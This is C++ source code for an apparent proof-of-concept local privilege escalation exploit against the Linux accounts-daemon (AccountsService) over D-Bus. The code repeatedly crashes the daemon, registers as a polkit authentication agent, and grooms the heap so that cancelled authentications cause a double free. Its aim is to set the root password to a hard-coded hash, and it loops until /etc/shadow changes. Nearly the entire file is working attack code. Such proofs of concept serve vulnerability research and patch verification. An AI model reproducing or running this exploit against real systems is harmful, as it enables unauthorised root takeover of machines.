#include "dbus_utils.hpp"
#include "dbus_auth.hpp"
#include "parse.hpp"
#include "utils.hpp"
#include <pwd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <dirent.h>
#include <errno.h>
#include <spawn.h>
#include <signal.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <pty.h>
#include <fcntl.h>
#include <functional>
#include <memory>
#include <utility>
#include <iostream>
#include <set>
#include <random>
#include <assert.h>

// Absolute path of the accounts-daemon executable. Declared as an array (not
// a pointer) so that sizeof(accounts_daemon) counts the terminating NUL; the
// callers pass that length to search_pid(), so argv[0] in
// /proc/<pid>/cmdline (whose arguments are NUL-separated) must match exactly.
static constexpr char accounts_daemon[] = "/usr/lib/accountsservice/accounts-daemon";

// File whose modification time is compared before/after each attempt.
static constexpr const char* etc_shadow_path = "/etc/shadow";

// Field-by-field equality for timespec: true only when both the seconds and
// the nanoseconds components match.
static bool timespec_eq(const timespec& t1, const timespec& t2) {
  if (t1.tv_sec != t2.tv_sec) {
    return false;
  }
  return t1.tv_nsec == t2.tv_nsec;
}

// This class creates an array containing the names of all the files in a
// directory. It does this by running `scandirat` in its constructor and
// frees the array (each entry plus the array itself) in its destructor.
// Because it owns that heap memory it is neither copyable nor assignable:
// an implicit copy would make both objects free the same entries.
class ScanDirAt {
  // Filled in by scandirat(); declared (and therefore initialized) before n_.
  struct dirent **namelist_ = nullptr;
  const int n_;

public:
  // Scans the directory referred to by `fd` (entries sorted with
  // `alphasort`, no filter). Throws ErrorWithErrno if `scandirat` fails.
  explicit ScanDirAt(int fd)
    : n_(scandirat(fd, ".", &namelist_, nullptr, alphasort))
  {
    if (n_ < 0) {
      throw ErrorWithErrno("ScanDirAt failed.");
    }
  }

  ScanDirAt(const ScanDirAt&) = delete;
  ScanDirAt& operator=(const ScanDirAt&) = delete;

  ~ScanDirAt();

  // Number of directory entries.
  int size() const { return n_; }

  // Name of entry `i`; `i` must be in [0, size()). The returned pointer is
  // only valid while this object is alive.
  const char* get(int i) const { return namelist_[i]->d_name; }
};

ScanDirAt::~ScanDirAt() {
  // The constructor throws when n_ < 0, so a constructed object always has
  // a valid array; the check is kept as a defensive guard.
  if (n_ >= 0) {
    for (int i = 0; i < n_; i++) {
      free(namelist_[i]);
    }
    free(namelist_);
  }
}

// Search `/proc/*/cmdline` to find the PID of a running program.
static std::vector<pid_t> search_pids(const char *cmdline, size_t cmdline_len) {
  AutoCloseFD procdir_fd(open("/proc", O_PATH | O_CLOEXEC));
  if (procdir_fd.get() < 0) {
    throw ErrorWithErrno("Could not open /proc.");
  }
  ScanDirAt scanDir(procdir_fd.get());

  const int n = scanDir.size();
  std::vector<pid_t> result;
  for (int i = 0; i < n; i++) {
    const char* subdir_name = scanDir.get(i);
    AutoCloseFD subdir_fd(
      openat(procdir_fd.get(), subdir_name, O_PATH | O_CLOEXEC)
    );
    if (procdir_fd.get() < 0) {
      continue;
    }
    AutoCloseFD cmdline_fd(
      openat(subdir_fd.get(), "cmdline", O_RDONLY | O_CLOEXEC)
    );
    if (cmdline_fd.get() < 0) {
      continue;
    }

    // Check if the command line matches.
    char buf[0x1000];
    ssize_t r = read(cmdline_fd.get(), buf, sizeof(buf));
    if (r < 0 || static_cast<size_t>(r) < cmdline_len) {
      continue;
    }
    if (memcmp(buf, cmdline, cmdline_len) == 0) {
      // The name of the sub-directory is the PID.
      result.push_back(atoi(subdir_name));
    }
  }
  return result;
}

// Return the PID of the one running process whose command line matches
// `cmdline` (same matching rules as search_pids). Returns -1 when no process
// matches, and also when more than one does.
static pid_t search_pid(const char *cmdline, size_t cmdline_len) {
  const std::vector<pid_t> matches = search_pids(cmdline, cmdline_len);
  return matches.size() == 1 ? matches.front() : -1;
}

class DBusSocket : public AutoCloseFD {
public:
  DBusSocket(const uid_t uid, const char* filename) :
    AutoCloseFD(socket(AF_UNIX, SOCK_STREAM, 0))
  {
    if (get() < 0) {
      throw ErrorWithErrno("Could not create socket");
    }

    sockaddr_un address;
    memset(&address, 0, sizeof(address));
    address.sun_family = AF_UNIX;
    strcpy(address.sun_path, filename);

    if (connect(get(), (sockaddr*)(&address), sizeof(address)) < 0) {
      throw ErrorWithErrno("Could not connect socket");
    }

    dbus_sendauth(uid, get());

    dbus_send_hello(get());
    std::unique_ptr<DBusMessage> hello_reply1 = receive_dbus_message(get());
    std::string name = hello_reply1->getBody().getElement(0)->toString().getValue();
    std::unique_ptr<DBusMessage> hello_reply2 = receive_dbus_message(get());
  }
};

static std::string getHomeDir(uid_t uid) {
  FILE *fp = fopen("/etc/passwd", "r");
  char buf[4096] = {};
  struct passwd pw;
  struct passwd *pwp;
  while (true) {
    if (fgetpwent_r(fp, &pw, buf, sizeof(buf), &pwp) != 0) {
      fclose(fp);
      char errmsg[256];
      snprintf(
        errmsg, sizeof(errmsg),
        "Could not find UID %u in /etc/passwd.",
        uid
      );
      throw Error(errmsg);
    }
    if (uid == pw.pw_uid) {
      fclose(fp);
      return _s(pw.pw_dir);
    }
  }
}

static std::string send_accountsservice_FindUserById(
  const int fd,
  const uint32_t serialNumber,
  const uid_t uid
) {
  printf("send_accountsservice_FindUserById: (serial %u) uid = %u\n", serialNumber, uid);

  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(
        DBusObjectInt64::mk(uid)
      )
    ),
    _s("/org/freedesktop/Accounts"),
    _s("org.freedesktop.Accounts"),
    _s("org.freedesktop.Accounts"),
    _s("FindUserById")
  );

  std::unique_ptr<DBusMessage> reply = receive_dbus_message(fd);

  if (reply->getHeader_messageType() != MSGTYPE_METHOD_RETURN) {
    throw Error("FindUserById returned an error.");
  }

  return reply->getBody().getElement(0)->toPath().getValue();
}

static void send_accountsservice_SetPassword(
  const int fd,
  const char* userpath,
  const char* password,
  const char* hint,
  const uint32_t serialNumber
) {
  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(
        DBusObjectString::mk(_s(password)),
        DBusObjectString::mk(_s(hint))
      )
    ),
    _s(userpath),
    _s("org.freedesktop.Accounts.User"),
    _s("org.freedesktop.Accounts"),
    _s("SetPassword")
  );

  // Don't wait for reply here because it's blocked on polkit.
}

static void send_accountsservice_set_property(
  const int fd,
  const uint32_t serialNumber,
  const char* userpath,
  const char* command,
  const char* value
) {
  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(
        DBusObjectString::mk(_s(value))
      )
    ),
    _s(userpath),
    _s("org.freedesktop.Accounts.User"),
    _s("org.freedesktop.Accounts"),
    _s(command)
  );

  std::unique_ptr<DBusMessage> reply = receive_dbus_message(fd);

  if (reply->getHeader_messageType() != MSGTYPE_METHOD_RETURN) {
    throw Error("set_property returned an error.");
  }
}

// Information that can be gathered once when we first start executing.
class ProgramInfo {
public:
  // Path to the dbus socket. (Usually: /var/run/dbus/system_bus_socket)
  // Only the pointer is stored, so the string must outlive this object.
  const char* dbus_socket_path_;

  // UID and PID of this process.
  const uid_t uid_;
  const pid_t pid_;

  // Start time of the process. (Needed to register as an authentication agent.)
  const uint64_t start_time_;

  // Home directory of uid_, as listed in /etc/passwd.
  const std::string homedir_;

  // Members are initialized in declaration order: start_time_ is computed
  // from pid_ and homedir_ from uid_, so that order must be preserved.
  // Throws whatever process_start_time() / getHomeDir() throw.
  explicit ProgramInfo(const char* dbus_socket_path) :
    dbus_socket_path_(dbus_socket_path),
    uid_(getuid()),
    pid_(getpid()),
    start_time_(process_start_time(pid_)),
    homedir_(getHomeDir(uid_))
  {
    // uid_t is unsigned and pid_t is signed; cast so each value matches its
    // printf conversion specifier exactly.
    printf("uid: %u\n", static_cast<unsigned>(uid_));
    printf("pid: %d\n", static_cast<int>(pid_));
    printf("home dir: %s\n", homedir_.c_str());
  }
};

// Register this process with polkit as an authentication agent by calling
// org.freedesktop.PolicyKit1.Authority.RegisterAuthenticationAgent over `fd`
// with serial `serialNumber`.
// Arguments sent:
//   - subject: ("unix-process", {pid, uid, start-time}) taken from `info`,
//   - locale:  "en",
//   - the agent's object path: /org/freedesktop/PolicyKit1/AuthenticationAgent.
// Blocks on the next received message and throws Error unless it is a method
// return.
static void send_polkit_RegisterAuthenticationAgent(
  const ProgramInfo& info,
  const int fd,
  const uint32_t serialNumber
) {
  std::unique_ptr<DBusMessageBody> body =
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(
        // Subject
        DBusObjectStruct::mk(
          _vec<std::unique_ptr<DBusObject>>(
            DBusObjectString::mk(_s("unix-process")), // subject_kind
            // Subject details: a dict of string -> variant.
            DBusObjectArray::mk1(
              _vec<std::unique_ptr<DBusObject>>(
                DBusObjectDictEntry::mk(
                  DBusObjectString::mk(_s("pid")),
                  DBusObjectVariant::mk(
                    DBusObjectUint32::mk(info.pid_)
                  )
                ),
                // NOTE(review): uid is sent as a signed int32 while pid is
                // uint32 — presumably matching polkit's expected types; confirm.
                DBusObjectDictEntry::mk(
                  DBusObjectString::mk(_s("uid")),
                  DBusObjectVariant::mk(
                    DBusObjectInt32::mk(info.uid_)
                  )
                ),
                DBusObjectDictEntry::mk(
                  DBusObjectString::mk(_s("start-time")),
                  DBusObjectVariant::mk(
                    DBusObjectUint64::mk(info.start_time_)
                  )
                )
              )
            )
          )
        ),
        DBusObjectString::mk(_s("en")), // locale
        DBusObjectString::mk(_s("/org/freedesktop/PolicyKit1/AuthenticationAgent")) // object path
      )
    );

  dbus_method_call(
    fd,
    serialNumber,
    std::move(body),
    _s("/org/freedesktop/PolicyKit1/Authority"),
    _s("org.freedesktop.PolicyKit1.Authority"),
    _s("org.freedesktop.PolicyKit1"),
    _s("RegisterAuthenticationAgent")
  );

  std::unique_ptr<DBusMessage> reply = receive_dbus_message(fd);

  if (reply->getHeader_messageType() != MSGTYPE_METHOD_RETURN) {
    throw Error("RegisterAuthenticationAgent returned an error.");
  }
}

// Answer a polkit "BeginAuthentication" `request` with the error
// org.freedesktop.PolicyKit1.Error.Cancelled, which cancels that
// authentication so polkit denies the request. The reply goes out on `fd`
// with serial `serialNumber`, addressed to the request's sender and tied to
// the request's serial. Having this as a separate step lets the caller
// decide when the cancellation happens (sometimes deliberately delayed).
static void polkit_cancel_auth(
  const int fd, const uint32_t serialNumber, const DBusMessage& request
) {
  // Whoever sent the request receives the error reply.
  const std::string& requester =
    request.getHeader_lookupField(MSGHDR_SENDER).getValue()->toString().getValue();
  const auto inReplyTo = request.getHeader_serialNumber();

  dbus_method_error_reply(
    fd,
    serialNumber,
    inReplyTo,
    _s(requester),
    _s("org.freedesktop.PolicyKit1.Error.Cancelled")
  );
}

// One exploit attempt. Constructing a Run opens two fresh D-Bus connections
// (one for polkit traffic, one for accounts-daemon traffic), both
// authenticated as info.uid_, and looks up this user's accounts-daemon
// object path. Construction throws if any of those steps fail.
class Run {
  // Borrowed reference; the ProgramInfo must outlive this object.
  const ProgramInfo& info_;

  // Path of the current user's ~/.pam_environment file.
  const std::string pam_env_path_;

  // We're going to exchange messages with polkit and accounts-daemon.
  // This is lazy coding, but the logic is simpler if we use two
  // separate sockets.
  const DBusSocket polkit_fd_;
  const DBusSocket accounts_fd_;

  // Serial number for the next outgoing D-Bus message; post-incremented on
  // every send.
  uint32_t serialNumber_;

  // Usually something like /org/freedesktop/Accounts/User1001
  const std::string my_objectpath_;

public:
  // my_objectpath_ is initialized using accounts_fd_ and serialNumber_, so it
  // must remain declared after them (members initialize in declaration order).
  explicit Run(const ProgramInfo& info) :
    info_(info),
    pam_env_path_(info_.homedir_ + _s("/.pam_environment")),
    polkit_fd_(info_.uid_, info_.dbus_socket_path_),
    accounts_fd_(info_.uid_, info_.dbus_socket_path_),
    serialNumber_(1000),
    my_objectpath_(
      send_accountsservice_FindUserById(accounts_fd_.get(), serialNumber_++, info_.uid_)
    )
  {}

  // This function triggers the bug by removing `~/.pam_environment` and
  // calling the "SetLanguage" method.
  // The unlink() result is not checked (presumably because the file may
  // already be absent). Errors from SetLanguage are swallowed on purpose.
  void trigger_bug() {
    unlink(pam_env_path_.c_str());
    try {
      send_accountsservice_set_property(
        accounts_fd_.get(), serialNumber_++, my_objectpath_.c_str(),
        "SetLanguage", "kevwozere"
      );
    } catch(Error&) {
      // An error is quite likely, so ignore it.
    }
  }

  // We use this function to make sure that we're starting from a clean slate.
  // It makes the exploit a bit less unreliable.
  // It keeps triggering the bug until search_pid() no longer reports exactly
  // one accounts-daemon process. Presumably a fresh daemon is then started on
  // demand by the next method call — NOTE(review): confirm.
  void restart_accounts_daemon() {
    while (true) {
      const pid_t pid = search_pid(accounts_daemon, sizeof(accounts_daemon));
      if (pid < 0) {
        printf("accounts-daemon is not running\n");
        break;
      }
      printf("accounts-daemon PID: %d\n", pid);
      trigger_bug();

      // Sleep for 0.5 seconds (500000000 ns), to give accounts-daemon a
      // chance to crash.
      timespec duration = {};
      duration.tv_sec = 0;
      duration.tv_nsec = 500000000;
      clock_nanosleep(CLOCK_MONOTONIC, 0, &duration, 0);
    }
  }

  // Perform one attempt. The steps are:
  //   1. restart accounts-daemon and register as a polkit agent;
  //   2. interleave SetEmail / SetPassword calls in two batches
  //      (batch_size1, then batch_size2), triggering the bug before each;
  //   3. cancel the resulting polkit authentications;
  //   4. send a final burst of SetEmail / SetPassword calls.
  // The statement order matters. Throws Error when accounts-daemon's
  // responses are not the expected ones (e.g. it crashed).
  void attempt_exploit(
    const size_t batch_size1,
    const size_t batch_size2
  ) {
    restart_accounts_daemon();

    send_polkit_RegisterAuthenticationAgent(info_, polkit_fd_.get(), serialNumber_++);

    // By default, accountsservice does not register the root user. This triggers it.
    const std::string root_objectpath =
      send_accountsservice_FindUserById(accounts_fd_.get(), serialNumber_++, 0);

    const pid_t pid = search_pid(accounts_daemon, sizeof(accounts_daemon));
    printf("Starting exploit. PID: %u\n", pid);

    // Trigger the bug.
    trigger_bug();

    // This is declared outside of the loop because we want to remember the
    // last value that it's set to.
    char email[128] = "kevwozere@kevwozere.com";

    // Try to occupy the chunk.
    for (size_t i = 0; i < batch_size1; i++) {
      // Changing the email address triggers a call to `save_extra_data`,
      // which causes a bunch of memory to be allocated and freed, but
      // without increasing the total memory usage. (At least, I haven't
      // noticed any memory leaks in that code.) So by jumbling the memory
      // up, it will hopefully increase the chance that one of the calls
      // to SetPassword will allocate the chunk that we want it to.
      snprintf(email, sizeof(email),
               "kevwozere@kevwozere.kevwozere.kevwozere.kevwozere.%.8lu.com", i
      );
      send_accountsservice_set_property(
        accounts_fd_.get(), serialNumber_++, my_objectpath_.c_str(),
        "SetEmail", email
      );

      // The password and hint are sized so that they will require a chunk
      // bigger than size 0x40.
      const char* password =
               "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef";
      const char* hint =
               "0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF";
      send_accountsservice_SetPassword(
        accounts_fd_.get(), root_objectpath.c_str(), password, hint, serialNumber_++
      );
    }

    // We expect to receive one polkit "BeginAuthentication" for each
    // "SetPassword" message that we sent.
    std::vector<std::unique_ptr<DBusMessage>> polkit_requests_batch1;
    polkit_requests_batch1.reserve(batch_size1);
    for (size_t i = 0; i < batch_size1; i++) {
      polkit_requests_batch1.push_back(receive_dbus_message(polkit_fd_.get()));
    }

    // Trigger the bug a second time. If things are going to plan
    // then the chunk currently contains the memory that was allocated
    // by `user_set_password`. We can control when `free_passwords`
    // gets called on it by releasing `polkit_requests_batch1`.
    trigger_bug();

    for (size_t i = 0; i < batch_size2; i++) {
      // Changing the email address triggers a call to `save_extra_data`,
      // which causes a bunch of memory to be allocated and freed, but
      // without increasing the total memory usage. (At least, I haven't
      // noticed any memory leaks in that code.) So by jumbling the memory
      // up, it will hopefully increase the chance that one of the calls
      // to SetPassword will allocate the chunk that we want it to.
      snprintf(email, sizeof(email),
               "kevwozere@kevwozere.kevwozere.kevwozere.kevwozere.%.8lu.com", i
      );
      send_accountsservice_set_property(
        accounts_fd_.get(), serialNumber_++, my_objectpath_.c_str(),
        "SetEmail", email
      );

      // The password and hint are sized so that they will require a chunk
      // of size 0x40.
      const char* password =
               "0123456789abcdef0123456789abcdef0123456789abcdef";
      const char* hint =
               "0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF";
      send_accountsservice_SetPassword(
        accounts_fd_.get(), root_objectpath.c_str(), password, hint, serialNumber_++
      );
    }

    // Reject all of the authentication requests from the first batch.
    for (size_t i = 0; i < batch_size1; i++) {
      polkit_cancel_auth(polkit_fd_.get(), serialNumber_++, *polkit_requests_batch1[i]);

      // We should get an error response back from accounts-daemon.
      std::unique_ptr<DBusMessage> reply = receive_dbus_message(accounts_fd_.get());
      if (reply->getHeader_messageType() != MSGTYPE_ERROR) {
        throw Error("Did not get the error response that we expected.");
      }
      // The error message should be org.freedesktop.Accounts.Error.PermissionDenied.
      // If it isn't then account-daemon probably crashed.
      const std::string& errmsg =
        reply->getHeader_lookupField(MSGHDR_ERROR_NAME).getValue()->toString().getValue();
      if (errmsg != _s("org.freedesktop.Accounts.Error.PermissionDenied")) {
        throw Error(_s(errmsg));
      }
    }

    // We expect to receive one polkit "BeginAuthentication" for each
    // "SetPassword" message that we sent in the second batch.
    // Before each receive, verify that the accounts-daemon PID recorded
    // earlier is still the single running instance.
    std::vector<std::unique_ptr<DBusMessage>> polkit_requests_batch2;
    polkit_requests_batch2.reserve(batch_size2);
    for (size_t i = 0; i < batch_size2; i++) {
      if (search_pid(accounts_daemon, sizeof(accounts_daemon)) != pid) {
        throw Error("accounts-daemon crash");
      }
      polkit_requests_batch2.push_back(receive_dbus_message(polkit_fd_.get()));
    }

    // Send a bunch of requests that will be approved by polkit (because
    // they only require org.freedesktop.accounts.change-own-user-data
    // permission). We're hoping that the auth data that is allocated for
    // one of these in `daemon_local_check_auth` (in an 0x40 chunk size)
    // will get freed before it is approved and overwritten with the auth
    // data for one of the subsequent SetPassword requests.
    // We alternate between the different messages because the timing
    // of when things will happen is very difficult to predict, so we
    // just have to rely on luck.
    // Replies to these calls are not read here.
    for (size_t i = 0; i < batch_size2 + 64; i++) {
      // Reject all of the authentication requests from the second batch.
      // This will hopefully cause a double free of one of the 0x40 chunks.
      if (i < batch_size2) {
        polkit_cancel_auth(polkit_fd_.get(), serialNumber_++, *polkit_requests_batch2[i]);
      }

      // Note: this sends the same email address as the most recent SetEmail
      // call (the final iteration of the batch2 loop above, which last wrote
      // into `email`). That's because we don't want
      // `user_change_email_authorized_cb` to call `save_extra_data`, which
      // would cause a bunch of memory churn that we don't want.
      dbus_method_call(
        accounts_fd_.get(),
        serialNumber_++,
        DBusMessageBody::mk(
          _vec<std::unique_ptr<DBusObject>>(
            DBusObjectString::mk(_s(email))
          )
        ),
        _s(my_objectpath_),
        _s("org.freedesktop.Accounts.User"),
        _s("org.freedesktop.Accounts"),
        _s("SetEmail")
      );

      // password: iaminvincible!
      const char* password =
        "$5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB";
      const char* hint = "GoldenEye";
      send_accountsservice_SetPassword(
        accounts_fd_.get(), root_objectpath.c_str(), password, hint, serialNumber_++
      );
    }

    // Give the messages a chance to get processed before we disconnect.
    sleep(2);
    printf("Finished iteration\n\n");
  }
};

int main(int argc, char* argv[]) {
  const char* progname = argc > 0 ? argv[0] : "a.out";
  if (argc != 2) {
    fprintf(
      stderr,
      "usage:   %s <unix socket>\n"
      "example: %s /var/run/dbus/system_bus_socket\n",
      progname,
      progname
    );
    return EXIT_FAILURE;
  }

  const char* dbus_socket_path = argv[1];

  try {
    // std::random is used to vary the batch sizes on each run, because
    // it's difficult to know which batch sizes are the most likely to
    // succeed.
    std::random_device rd;
    std::mt19937 gen(rd());
    std::uniform_int_distribution<> distrib(1, 64);

    ProgramInfo info(dbus_socket_path);

    // When the poc is successful, the root user's password is set,
    // which causes /etc/shadow to be modified. So we can use stat
    // to detect when the exploit was successful.
    struct stat statorig;
    stat(etc_shadow_path, &statorig);

    while(true) {
      try {
        Run run(info);
        const size_t batch_size1 = distrib(gen);
        const size_t batch_size2 = distrib(gen);
        printf("batch sizes: %ld %ld\n", batch_size1, batch_size2);
        run.attempt_exploit(batch_size1, batch_size2);
      } catch (Error& e) {
        printf("%s\n", e.what());
        sleep(2);
      }
      struct stat statnew;
      stat(etc_shadow_path, &statnew);
      if (!timespec_eq(statnew.st_mtim, statorig.st_mtim)) {
        printf("%s was modified!\n", etc_shadow_path);
        break;
      }
    }
  } catch (ErrorWithErrno& e) {
    const int err = e.getErrno();
    fprintf(stderr, "%s\n%s\n", e.what(), strerror(err));
    return EXIT_FAILURE;
  } catch (std::exception& e) {
    fprintf(stderr, "%s\n", e.what());
    return EXIT_FAILURE;
  }

  return EXIT_SUCCESS;
}
